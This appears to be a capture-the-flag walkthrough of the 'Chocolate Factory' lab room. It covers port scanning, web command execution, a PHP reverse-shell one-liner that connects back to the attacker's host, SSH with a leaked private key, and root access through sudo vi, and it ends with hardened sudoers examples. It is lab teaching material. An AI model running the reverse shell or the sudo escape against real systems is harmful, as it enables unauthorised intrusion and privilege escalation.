In this post, I would like to share a walkthrough of the Chocolate Factory room.
This room is rated as a LOW-difficulty machine.
Let’s Start!
We need to deploy the machine before we can play with it.
Once the machine is fully up (within about 5 minutes), we can start information gathering on it by executing the command nmap -sC -sV <IP Address> -PN
Information Gathering on Chocolate Factory
There are multiple open ports, but the ones that caught my attention are:
- 21: vsftpd 3.0.2
- 22: OpenSSH 7.6p1
- 80: Apache httpd 2.6.29
Let’s check what is stored inside the website.
Let’s start enumerating the website by executing the command dirb <IP Address> /usr/share/wordlist/common.txt -X .php,.html and hope that we find something useful.
We did find something useful: the home.php page.
The page shows a search box where you can key in any command, plus an EXECUTE button.
Let’s try any command that works on Linux.
The command used below is uname -a
Let’s see what is stored on the server. Oh wow! I notice a file named key_rev_key
Let’s try to download the file by accessing the location in the browser as shown below
Sadly, the file is hard to read, but I notice the key appears in the middle of the output.
Running commands through the browser is cumbersome. Let’s upload a shell so that we can access the machine from the terminal.
A shell that we can use in this situation is the following:
php -r '$sock=fsockopen("ip-address",port);exec("/bin/sh -i <&3 >&3 2>&3");'
* Replace ip-address and port with your own IP and a port of your choosing
For this activity, I use 1234 as my port.
Let’s read the user.txt file in the /home/charlie directory.
However, we cannot read the file because permission is denied. Let’s see what is written in the teleport file by running cat teleport
We need to copy everything in teleport into a file named id_rsa on our own machine.
This lets us get access via SSH by running the command below
ssh charlie@<IP Address> -i id_rsa
SSH Access to the machine
Now we can read user.txt using charlie’s credentials.
Got it! Now we need to focus on gaining root privileges.
Let’s run the command sudo -l
I notice that /usr/bin/vi can be run with sudo, which lets us gain root privileges.
Inside vi we can execute :!/bin/sh and press Enter. We have successfully gained root access.
I don’t find root.txt, but we do find root.py in the /root/ directory.
Let’s run root.py with python. The key we need to enter is the same key as in the first question of the challenge!
While we have root privileges, let’s find charlie’s password by going to the /var/www/html directory.
We need to read validate.php in order to retrieve charlie’s password.
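The root step above works because of a sudoers rule, not a bug in vi: any interactive editor run as root can spawn a shell. As an added example that is not from the room or the original post, here is the kind of rule that produces that finding next to two hardened forms; the exact rule for charlie and the /etc/motd path are assumptions, since the post only shows that sudo -l lists /usr/bin/vi.

```sudoers
# Weak rule (assumed; the shape of entry that makes 'sudo -l' list /usr/bin/vi).
# vi can run ':!/bin/sh', so this is effectively unrestricted root.
charlie ALL=(ALL) NOPASSWD: /usr/bin/vi

# Hardened option 1: sudoedit edits a temporary copy as the calling user and
# only the final write-back happens as root, so no editor ever runs with
# root privileges. Scope it to the one file that actually needs editing.
charlie ALL=(ALL) sudoedit /etc/motd

# Hardened option 2: if an editor must run as root, the NOEXEC tag makes sudo
# block the editor from executing child processes such as /bin/sh
# (on platforms where sudo's noexec support is available). Again, restrict
# the argument so the rule cannot be used on arbitrary files.
charlie ALL=(ALL) NOEXEC: /usr/bin/vi /etc/motd
```

Validate edits with visudo -c before relying on them, and re-run sudo -l as the user to confirm that only the intended rule is listed.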
-THE END-
Happy Learning Guys!